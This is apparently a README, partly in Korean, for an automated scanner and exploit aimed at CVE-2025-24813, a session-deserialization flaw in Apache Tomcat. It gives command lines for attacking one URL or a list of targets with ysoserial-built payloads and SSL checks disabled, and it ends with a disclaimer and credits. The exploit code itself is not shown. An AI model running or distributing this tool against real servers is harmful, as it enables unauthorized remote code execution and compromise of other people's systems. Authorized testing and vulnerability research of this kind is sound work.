
Automated scanner + exploit for CVE-2025-24813
이것은 CVE-2025-24813을 위한 고급 자동화 익스플로잇 도구로, 안전하지 않은 세션 역직렬화에 취약한 Apache Tomcat 서버를 대상으로 합니다.
--targets / --url)# Single target
python3 exploit_cve_2025_24813.py \
--url http://target:8080 \
--ysoserial ysoserial.jar \
--no-ssl-verify
# Multiple targets from file
python3 exploit_cve_2025_24813.py \
--targets targets.txt \
--ysoserial ysoserial.jar \
--no-ssl-verify
Python 3.6+
Java Runtime (ysoserial용)
ysoserial Java 바이너리
이 도구는 교육 및 공인된 보안 테스트 목적으로만 제공됩니다. 귀하가 소유하지 않거나 명시적 허가 없이 테스트하는 시스템에 대한 무단 사용은 엄격히 금지되며 불법이 될 수 있습니다.
📚 크레딧
이 프로젝트는 Apache License 2.0에 따라 공개된 공개 PoC에서 영감을 받았습니다. 원본 PoC 작성자: absholi7ly 향상 및 재작성: mehrdad mirabi